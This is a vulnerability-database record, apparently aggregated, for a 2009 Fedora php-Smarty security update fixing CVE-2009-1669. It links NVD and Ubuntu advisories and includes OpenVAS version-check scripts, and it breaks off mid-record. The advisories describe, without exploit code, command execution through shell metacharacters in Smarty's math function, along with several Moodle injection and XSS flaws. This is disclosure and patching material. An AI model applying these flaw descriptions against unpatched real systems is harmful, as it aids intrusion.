ID: FEDORA:8E04C10F880
Type: fedora
Reporter: Fedora
Modified: 2009-05-27T19:08:31
Description
Although Smarty is known as a "Template Engine", it would be more accurately described as a "Template/Presentation Framework." That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress the word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth.
{"id": "FEDORA:8E04C10F880", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 11 Update: php-Smarty-2.6.25-1.fc11", "description": "Although Smarty is known as a \"Template Engine\", it would be more accurately described as a \"Template/Presentation Framework.\" That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress t he word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth. ", "published": "2009-05-27T19:08:31", "modified": "2009-05-27T19:08:31", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2009-1669"], "lastseen": "2020-12-21T08:17:49", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1669"]}, {"type": "ubuntu", "idList": ["USN-791-3", "USN-791-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22076", "SECURITYVULNS:VULN:10012"]}, {"type": "nessus", "idList": ["UBUNTU_USN-791-1.NASL", "UBUNTU_USN-791-3.NASL", "FEDORA_2009-5525.NASL", "FEDORA_2009-5516.NASL", "DEBIAN_DSA-1919.NASL", "GENTOO_GLSA-201006-13.NASL", "FEDORA_2009-5520.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231067847", "OPENVAS:64322", "OPENVAS:136141256231064079", "OPENVAS:64080", "OPENVAS:64079", "OPENVAS:136141256231066103", "OPENVAS:136141256231064080", "OPENVAS:66103", "OPENVAS:64078", "OPENVAS:136141256231064078"]}, {"type": "fedora", "idList": ["FEDORA:8A68710F895", "FEDORA:6E6DC10F895"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1919-2:73FE7", "DEBIAN:DSA-1919-1:C1894"]}, {"type": "exploitdb", "idList": ["EDB-ID:8659"]}, {"type": "gentoo", "idList": 
["GLSA-201006-13"]}], "modified": "2020-12-21T08:17:49", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-12-21T08:17:49", "rev": 2}, "vulnersScore": 5.1}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "11", "arch": "any", "packageName": "php-Smarty", "packageVersion": "2.6.25", "packageFilename": "UNKNOWN", "operator": "lt"}]}
{"cve": [{"lastseen": "2020-10-03T11:54:13", "description": "The smarty_function_math function in libs/plugins/function.math.php in Smarty 2.6.22 allows context-dependent attackers to execute arbitrary commands via shell metacharacters in the equation attribute of the math function. NOTE: some of these details are obtained from third party information.\nPer http://secunia.com/advisories/35072\r\n\"The vulnerability is confirmed in version 2.6.22 on Windows. Other versions may also be affected.\"", "edition": 3, "cvss3": {}, "published": "2009-05-18T18:30:00", "title": "CVE-2009-1669", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1669"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:smarty:smarty:2.6.22"], "id": "CVE-2009-1669", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1669", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:smarty:smarty:2.6.22:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T01:33:51", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1669"], "description": "It was discovered that Smarty did not correctly filter certain math \ninputs. 
A remote attacker using Smarty via a web service could exploit \nthis to execute subsets of shell commands as the web server user.", "edition": 5, "modified": "2009-06-24T00:00:00", "published": "2009-06-24T00:00:00", "id": "USN-791-3", "href": "https://ubuntu.com/security/notices/USN-791-3", "title": "Smarty vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0501", "CVE-2008-4811", "CVE-2008-5432", "CVE-2008-5619", "CVE-2009-0502", "CVE-2008-4810", "CVE-2008-4796", "CVE-2008-6124", "CVE-2008-5153", "CVE-2009-0499", "CVE-2009-0500", "CVE-2009-1171", "CVE-2009-1669", "CVE-2007-3215"], "description": "Thor Larholm discovered that PHPMailer, as used by Moodle, did not \ncorrectly escape email addresses. A local attacker with direct access \nto the Moodle database could exploit this to execute arbitrary commands \nas the web server user. (CVE-2007-3215)\n\nNigel McNie discovered that fetching https URLs did not correctly escape \nshell meta-characters. An authenticated remote attacker could execute \narbitrary commands as the web server user, if curl was installed and \nconfigured. (CVE-2008-4796, MSA-09-0003)\n\nIt was discovered that Smarty (also included in Moodle), did not \ncorrectly filter certain inputs. An authenticated remote attacker could \nexploit this to execute arbitrary PHP commands as the web server user. \n(CVE-2008-4810, CVE-2008-4811, CVE-2009-1669)\n\nIt was discovered that the unused SpellChecker extension in Moodle did not \ncorrectly handle temporary files. If the tool had been locally modified, \nit could be made to overwrite arbitrary local files via symlinks. \n(CVE-2008-5153)\n\nMike Churchward discovered that Moodle did not correctly filter Wiki page \ntitles in certain areas. 
An authenticated remote attacker could exploit \nthis to cause cross-site scripting (XSS), which could be used to modify \nor steal confidential data of other users within the same web domain. \n(CVE-2008-5432, MSA-08-0022)\n\nIt was discovered that the HTML sanitizer, \"Login as\" feature, and logging \nin Moodle did not correctly handle certain inputs. An authenticated \nremote attacker could exploit this to generate XSS, which could be used \nto modify or steal confidential data of other users within the same \nweb domain. (CVE-2008-5619, CVE-2009-0500, CVE-2009-0502, MSA-08-0026, \nMSA-09-0004, MSA-09-0007)\n\nIt was discovered that the HotPot module in Moodle did not correctly \nfilter SQL inputs. An authenticated remote attacker could execute \narbitrary SQL commands as the moodle database user, leading to a loss \nof privacy or denial of service. (CVE-2008-6124, MSA-08-0010)\n\nKevin Madura discovered that the forum actions and messaging settings \nin Moodle were not protected from cross-site request forgery (CSRF). \nIf an authenticated user were tricked into visiting a malicious \nwebsite while logged into Moodle, a remote attacker could change the \nuser's configurations or forum content. (CVE-2009-0499, MSA-09-0008, \nMSA-08-0023)\n\nDaniel Cabezas discovered that Moodle would leak usernames from the \nCalendar Export tool. A remote attacker could gather a list of users, \nleading to a loss of privacy. (CVE-2009-0501, MSA-09-0006)\n\nChristian Eibl discovered that the TeX filter in Moodle allowed any \nfunction to be used. An authenticated remote attacker could post \na specially crafted TeX formula to execute arbitrary TeX functions, \npotentially reading any file accessible to the web server user, leading \nto a loss of privacy. (CVE-2009-1171, MSA-09-0009)\n\nJohannes Kuhn discovered that Moodle did not correctly validate user \npermissions when attempting to switch user accounts. 
An authenticated \nremote attacker could switch to any other Moodle user, leading to a loss \nof privacy. (MSA-08-0003)\n\nHanno Boeck discovered that unconfigured Moodle instances contained \nXSS vulnerabilities. An unauthenticated remote attacker could exploit \nthis to modify or steal confidential data of other users within the same \nweb domain. (MSA-08-0004)\n\nDebbie McDonald, Mauno Korpelainen, Howard Miller, and Juan Segarra \nMontesinos discovered that when users were deleted from Moodle, their \nprofiles and avatars were still visible. An authenticated remote attacker \ncould exploit this to store information in profiles even after they were \nremoved, leading to spam traffic. (MSA-08-0015, MSA-09-0001, MSA-09-0002)\n\nLars Vogdt discovered that Moodle did not correctly filter certain inputs. \nAn authenticated remote attacker could exploit this to generate XSS from \nwhich they could modify or steal confidential data of other users within \nthe same web domain. (MSA-08-0021)\n\nIt was discovered that Moodle did not correctly filter inputs for group \ncreation, mnet, essay question, HOST param, wiki param, and others. \nAn authenticated remote attacker could exploit this to generate XSS \nfrom which they could modify or steal confidential data of other users \nwithin the same web domain. (MDL-9288, MDL-11759, MDL-12079, MDL-12793, \nMDL-14806)\n\nIt was discovered that Moodle did not correctly filter SQL inputs when \nperforming a restore. An attacker authenticated as a Moodle administrator \ncould execute arbitrary SQL commands as the moodle database user, \nleading to a loss of privacy or denial of service. 
(MDL-11857)", "edition": 5, "modified": "2009-06-24T00:00:00", "published": "2009-06-24T00:00:00", "id": "USN-791-1", "href": "https://ubuntu.com/security/notices/USN-791-1", "title": "Moodle vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-1669"], "description": "===========================================================\r\nUbuntu Security Notice USN-791-3 June 24, 2009\r\nsmarty vulnerability\r\nCVE-2009-1669\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 9.04\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 9.04:\r\n smarty 2.6.22-1ubuntu1.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that Smarty did not correctly filter certain math\r\ninputs. 
A remote attacker using Smarty via a web service could exploit\r\nthis to execute subsets of shell commands as the web server user.\r\n\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22-1ubuntu1.1.diff.gz\r\n Size/MD5: 5384 cddf82ac12a8bf55573d7382cbbb3609\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22-1ubuntu1.1.dsc\r\n Size/MD5: 1220 b96705a4b32e7e7e0965a71986f908b8\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22.orig.tar.gz\r\n Size/MD5: 158529 a6e1d94453104c42374901da5139744c\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/smarty/smarty_2.6.22-1ubuntu1.1_all.deb\r\n Size/MD5: 204018 7ed9dc3ba0843ff6b2acf57f94ee31c3\r\n", "edition": 1, "modified": "2009-06-25T00:00:00", "published": "2009-06-25T00:00:00", "id": "SECURITYVULNS:DOC:22076", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22076", "title": "[USN-791-3] Smarty vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-1151", "CVE-2009-1150", "CVE-2009-1669"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2009-06-26T00:00:00", "published": "2009-06-26T00:00:00", "id": "SECURITYVULNS:VULN:10012", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10012", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1669"], "description": "Although Smarty is known as a \"Template 
Engine\", it would be more accurately described as a \"Template/Presentation Framework.\" That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress t he word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth. ", "modified": "2009-05-27T19:07:46", "published": "2009-05-27T19:07:46", "id": "FEDORA:8A68710F895", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: php-Smarty-2.6.25-1.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1669"], "description": "Although Smarty is known as a \"Template Engine\", it would be more accurately described as a \"Template/Presentation Framework.\" That is, it provides the programmer and template designer with a wealth of tools to automate tasks commonly dealt with at the presentation layer of an application. I stress t he word Framework because Smarty is not a simple tag-replacing template engine. Although it can be used for such a simple purpose, its focus is on quick and painless development and deployment of your application, while maintaining high-performance, scalability, security and future growth. 
", "modified": "2009-05-27T19:06:20", "published": "2009-05-27T19:06:20", "id": "FEDORA:6E6DC10F895", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: php-Smarty-2.6.25-1.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-12-04T11:29:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory USN-791-3.", "modified": "2017-12-01T00:00:00", "published": "2009-06-30T00:00:00", "id": "OPENVAS:64322", "href": "http://plugins.openvas.org/nasl.php?oid=64322", "type": "openvas", "title": "Ubuntu USN-791-3 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_791_3.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_791_3.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-791-3 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 9.04:\n smarty 2.6.22-1ubuntu1.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-791-3\";\n\ntag_insight = \"It was discovered that Smarty did not correctly filter certain math\ninputs. A remote attacker using Smarty via a web service could exploit\nthis to execute subsets of shell commands as the web server user.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory USN-791-3.\";\n\n \n\n\nif(description)\n{\n script_id(64322);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-30 00:29:55 +0200 (Tue, 30 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-791-3 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-791-3/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.22-1ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064078", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064078", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-5525 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5525.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5525 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5525\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64078\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-5525 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064080", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064080", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-5520 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5520.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5520 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5520\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64080\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-5520 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64079", "href": "http://plugins.openvas.org/nasl.php?oid=64079", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-5516 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5516.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5516 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5516\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.\";\n\n\n\nif(description)\n{\n script_id(64079);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-5516 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
